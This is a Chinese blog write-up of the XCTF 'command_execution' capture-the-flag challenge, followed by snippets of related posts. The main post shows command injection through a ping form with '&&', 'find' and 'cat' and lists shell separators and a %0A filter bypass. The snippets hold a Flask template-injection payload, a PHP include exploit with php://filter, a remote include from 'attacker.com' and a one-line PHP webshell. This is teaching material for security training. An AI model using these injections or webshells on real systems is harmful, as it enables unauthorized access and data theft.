XCTF攻防世界web新手练习_ 9_command_execution

最新推荐文章于 2024-10-14 20:41:54 发布
最新推荐文章于 2024-10-14 20:41:54 发布
阅读量5.5k 收藏 15
点赞数 7
CC 4.0 BY-SA版权
分类专栏: ctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/silence1_/article/details/89673091
本文通过实战解析XCTF平台上的command_execution题目,演示如何利用命令执行漏洞获取flag。文章介绍了命令执行漏洞的概念,展示了如何使用特殊字符绕过过滤,执行额外命令,最终找到并读取flag文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XCTF攻防世界web新手练习—command_execution

题目

题目为command_execution,是命令执行的意思,可见这道题应该跟命名执行有关。
在这里插入图片描述
打开题目,看到一个功能框,根据题目,是用来实现ping功能的。
在这里插入图片描述
首先先尝试ping一下127.0.0.1,成功ping通,并回显执行的命令为

ping -c 3  127.0.0.1

在这里插入图片描述
于是我们尝试用&&符号执行多个命令,先尝试一下ls命令,输入127.0.0.1 &&ls
在这里插入图片描述
可见,成功执行ls命令。于是顺理成章查找所有以 .txt 结尾的文件。
用find命令。输入127.0.0.1 &&find / -name "*.txt"
在这里插入图片描述
看到第一个就是flag.txt,于是利用命令cat 直接查看它

127.0.0.1 && cat /home/flag.txt

在这里插入图片描述
得到flag!

命令执行漏洞

命令执行漏洞是什么:

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。

比如题目中,直接把用户输入的参数不经过过滤直接放在ping命令之后,而恶意攻击者可以在输入的参数中用&&截断,而执行下一个恶意命令

常见连接符

;A;B 先执行A,再执行B
& A&B 简单拼接,A B之间无制约关系
| A|B 显示B的执行结果
&& A&&B A执行成功,然后才会执行B
|| A||B A执行失败,然后才会执行B

常见连接符举例效果
;A;B先执行A,再执行B
&A&B简单拼接,A B之间无制约关系
|A|B显示B的执行结果
&&A&&BA执行成功,然后才会执行B
||A||BA执行失败,然后才会执行B

另外,%0A 是换行符的url编码形式,有的时候可以用来绕过对以上常见的连接符过滤了的情况。

xctfcommand_execution
rrorb的博客
01-09 2456
解题思路及步骤 打开网页跳转到如下界面; 先尝试ping一下本地主机 ping 127.0.0.1 分析数据,ping发包3次,3次都收到了回复,TTL值为64,用时1998ms; 题目有一点小小的提示,command execution是命令执行漏洞的意思,因此我们可以从这里下手尝试利用命令执行漏洞拿flag; windows和Linux的命令连接符如下: |:command1|command2 直接执行command2 ||:command1||command2 只..
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1195
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
xctf-command_execution(命令执行)
烟敛寒林的博客
02-25 4777
题目地址: http://111.198.29.45:30887 主要利用hackbar进行POST注入 ls命令查看目录文件,具体用法可见: https://blog.youkuaiyun.com/dyw_666666/article/details/79184126 ls发现home目录下有flag.txt文件,然后用cat命令查看txt文件 ...
攻防世界(WEB)——command_execution
NanGuai的博客
10-14 701
首先ping本地(127.0.0.1)可以看到能够连通,想要在ping中夹杂其他指令,可以在命令后跟上分号即可按顺序执行。find / -name “flag*”,可以在找到一个名为flag.txt的文件夹(/home/flag.txt)。要读取本机的文件,首先可以确定要ping的IP地址为127.0.0.1。其大致原理是通过Web应用程序的流量来监控和过滤,从而达到阻止潜在风险的目的。ping是一个大部分人都用过或听过的东西,在我的知识储备里目前就是一个用来检测某个IP通不通的工具。
xctfcommand_execution
recordliu的博客
01-28 356
观察题目, 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&&’ ‘&’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:127.0.0.1;cat /hom...
攻防世界 web入门 command_execution(命令执行)
weixin_45774059的博客
06-03 270
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3655
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
xctf攻防世界web新手练习区--write up
热门推荐
qq_43081170的博客
07-05 3万+
** 文章目录 ** view source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 打开题目后显示FLAG is not here,而且题目描述提示鼠标右键不管用了。这时想到F12键打开开发者工具,查看器可以查看页面源代码。F12----查看器直接得到答案。 get post **题目描述:**X老师告诉小宁同学HTTP通常使用两种请求方法,你...
XCTF 攻防世界 web 新手练习
XQin9T1an的博客
07-24 7686
XCTFweb新手练习题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0 0x01 view_source 题目链接:http://111.198.29.45:51846/ 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 根据题目提示和标题,我们可以...
XCTF WEB command_execution
无限迭代中......
06-30 379
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5071 题解: windows或linux下: command1 && command2 先执行command1,如果为真,再执行command2 command1 | command2 只执行command...
xctf攻防世界 Web高手进阶区 command_execution
l8947943的博客
08-02 9701
Web应用防护系统(也称为网站应用级入侵防御系统。英文WebApplicationFirewall,简称WAF)。利用国际上公认的一种说法Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。如果没有开waf,将会出现网页被篡改等问题发生。...
XCTF-command_execution
weixin_45613760的博客
08-01 321
XCTF-command_execution题目介绍打开题目场景打开hackbar,查找有无与flag相关的文件发现在home目录下有flag.txt文件使用cat指令查看得到flag 题目介绍 看到ping或者ping命令却没有弄waf时就要想到命令注入 打开题目场景 使用hackbar进行POST注入 打开hackbar,查找有无与flag相关的文件 发现在home目录下有flag.txt文件 使用cat指令查看 得到flag 然后就得到flag辣 ...
XCTF command_execution
YenKoc的博客
12-04 319
讲道理这题算是我的思路盲区,先试着ping下本地的地址,127.0.0.1 看了大佬的wp时,我突然意识到,这是放在服务器上执行的,而且服务器一般都是linux系统的,所以linux命令是必需的, 思路分析:猜测上是服务器上那位同学写了一个可以执行ping命令的程序,但是没加限制,这里有可能会出现命令拼接。 命令拼接: | 将上一句的命令作为输入,执行下一句的命令 && 第一句...
[Xctf-web]command_execution
weixin_53146913的博客
03-03 4063
command_execution 题目来源: Cyberpeace-n3k0 题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的, 你知道为什么吗。 题目场景: http://220.249.52.133:31096 1. 知识点介绍: Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称:WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系 列针对HTTP/HTTPS的安全策略来专...
12、XCTF command_execution
山兔的博客
09-16 169
一打开网站,就看到下面这句话 小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 在框框里面输 127.0.0.1 有反应,看了一下,返回的数据,感觉是linux 用ls,看一下。 可以,那就是linux, (后面用dir,发现也可以) 反正是可以执行,无所谓了, 先查找文件,用hackbar target=127.0.0.1|find / -name flag.txt 找到了,/home/flag.txt 去找他们在那个目录, 用ls去查一下有什么文件 127.0.0
攻防世界web新手关之command_execution
weixin_45746283的博客
11-16 666
攻防世界web新手关之command_execution 需要使用到ping注入
攻防世界Webcommand_execution、xff_referer、webshell” 题解
qq_53325209的博客
03-21 4956
攻防世界Web “xff_referer、webshell、command_execution” 三道题解。
command_execution
qq_52431855的博客
12-13 341
命令执行 知识点: PING (Packet Internet Grope):因特网包探索器,用于测试网络连接量的程序。 Ping 127.0.0.1:127.0.0.1是本地循环地址 PING指令 : ...
xctf web_php_include
最新发布
03-29
<think>好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接来自Cookie中的language值,然后拼接.php后缀进行包含。这种情况下,如果没有严格的过滤,攻击者可能通过修改Cookie来包含任意文件,比如利用路径遍历或者远程文件包含。 接下来,我需要考虑常见的利用方法。例如,路径遍历攻击,用户可能构造类似../../etc/passwd的payload来读取系统文件。此外,如果服务器配置允许远程包含(allow_url_include为On),攻击者可以包含恶意服务器上的文件执行代码。引用[3]的PHP类型比较文档可能帮助理解变量处理,但这里更关键的是文件包含漏洞。 然后,解题步骤可能包括:检查代码中是否存在未过滤的用户输入,尝试包含敏感文件如/etc/passwd,或者上传恶意文件并通过包含执行。例如,在引用[4]的情况中,设置Cookie的language为../../../tmp/uploaded_file,如果存在上传临时文件的话。还可能利用PHP伪协议,如php://filter来读取源码,比如?lan=php://filter/convert.base64-encode/resource=config,这样可以获取base64编码后的文件内容。 同时,需要注意引用[2]中提到的情况,通过文件包含读取admin.php或function.php的源码,这可能泄露关键信息。此外,确保回答中引用了正确的来源,比如引用[4]的代码示例,说明如何利用Cookie进行文件包含。 最后,生成相关问题时要覆盖漏洞原理、利用方式、防御措施和CTF中的其他常见漏洞,帮助用户全面理解。需要确保回答结构清晰,步骤详细,并且引用正确,比如在关键点后添加[^4]或[^2]。</think>### XCTF PHP include Web安全漏洞解题思路 在CTF竞赛中,PHP的`include`函数常因未正确过滤用户输入导致文件包含漏洞。以下是基于引用[4]的代码分析及典型解题方法: --- #### **漏洞原理** 1. **关键代码片段** 通过Cookie中的`language`参数动态包含文件: ```php $lan = $_COOKIE[&#39;language&#39;]; @include($lan.".php"); ``` 若未对`$lan`进行过滤,攻击者可通过路径遍历(如`../../../etc/passwd`)或PHP伪协议(如`php://filter`)读取任意文件[^4]。 2. **漏洞利用条件** - 目标服务器开启`allow_url_include`(远程文件包含) - 文件路径可控且未限制文件后缀 --- #### **解题步骤** 1. **探测漏洞** - 修改Cookie中`language`值为`../../../../etc/passwd%00`,尝试读取系统文件(需PHP版本<5.3.4,因空字节截断漏洞)[^4]。 2. **利用PHP伪协议** - **读取源码**:构造Payload为`php://filter/convert.base64-encode/resource=index`,通过Base64解码获取源码: ```http Cookie: language=php://filter/convert.base64-encode/resource=index ``` - **远程代码执行**:若允许远程包含,设置`language=http://attacker.com/shell.txt`,触发恶意代码执行。 3. **结合文件上传** - 若存在文件上传功能,上传含恶意代码的图片(如`<?php system($_GET[&#39;cmd&#39;]);?>`),通过包含临时文件路径实现RCE: ```http Cookie: language=../../../tmp/uploaded_file ``` --- #### **防御措施** 1. 白名单限制包含路径(如只允许包含`en/`或`zh/`目录) 2. 使用`basename()`函数过滤路径中的特殊字符 3. 关闭`allow_url_include`配置 ---
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值